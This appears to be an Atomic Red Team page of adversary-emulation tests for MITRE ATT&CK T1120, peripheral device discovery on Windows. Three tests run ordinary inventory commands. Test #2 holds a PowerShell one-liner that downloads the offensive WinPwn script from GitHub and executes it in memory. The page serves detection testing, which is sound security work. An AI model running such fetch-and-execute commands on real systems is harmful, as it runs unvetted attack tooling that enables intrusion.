# T1120 - Peripheral Device Discovery
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1120)
<blockquote>

Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.(Citation: Peripheral Discovery Linux)(Citation: Peripheral Discovery macOS) Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.

</blockquote>

## Atomic Tests

- [Atomic Test #1 - Win32_PnPEntity Hardware Inventory](#atomic-test-1---win32_pnpentity-hardware-inventory)

- [Atomic Test #2 - WinPwn - printercheck](#atomic-test-2---winpwn---printercheck)

- [Atomic Test #3 - Peripheral Device Discovery via fsutil](#atomic-test-3---peripheral-device-discovery-via-fsutil)

- [Atomic Test #4 - Get Printer Device List via PowerShell Command](#atomic-test-4---get-printer-device-list-via-powershell-command)


<br/>

## Atomic Test #1 - Win32_PnPEntity Hardware Inventory
Perform peripheral device discovery using Get-WMIObject Win32_PnPEntity

**Supported Platforms:** Windows


**auto_generated_guid:** 2cb4dbf2-2dca-4597-8678-4d39d207a3a5






#### Attack Commands: Run with `powershell`! 


```powershell
Get-WMIObject Win32_PnPEntity | Format-Table Name, Description, Manufacturer > $env:TEMP\T1120_collection.txt
$Space,$Heading,$Break,$Data = Get-Content $env:TEMP\T1120_collection.txt
@($Heading; $Break; $Data |Sort-Object -Unique) | ? {$_.trim() -ne "" } |Set-Content $env:TEMP\T1120_collection.txt
```

#### Cleanup Commands:
```powershell
Remove-Item $env:TEMP\T1120_collection.txt -ErrorAction Ignore
```





<br/>
<br/>

## Atomic Test #2 - WinPwn - printercheck
Search for printers / potential vulns using printercheck function of WinPwn

**Supported Platforms:** Windows


**auto_generated_guid:** cb6e76ca-861e-4a7f-be08-564caa3e6f75






#### Attack Commands: Run with `powershell`! 


```powershell
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
printercheck -noninteractive -consoleoutput
```






<br/>
<br/>

## Atomic Test #3 - Peripheral Device Discovery via fsutil
Performs pheripheral device discovery utilizing fsutil to list all drives.

**Supported Platforms:** Windows


**auto_generated_guid:** 424e18fd-48b8-4201-8d3a-bf591523a686






#### Attack Commands: Run with `command_prompt`! 


```cmd
fsutil fsinfo drives
```






<br/>
<br/>

## Atomic Test #4 - Get Printer Device List via PowerShell Command
This test uses PowerShell to list printers on a Windows system, demonstrating a discovery technique attackers might use to 
gather details on connected devices. Using Get-Printer, they can view information on all available printers, identifying 
potential devices for further targeting.

**Supported Platforms:** Windows


**auto_generated_guid:** 5c876daf-db1e-41cf-988d-139a7443ccd4






#### Attack Commands: Run with `powershell`! 


```powershell
Get-Printer
```






<br/>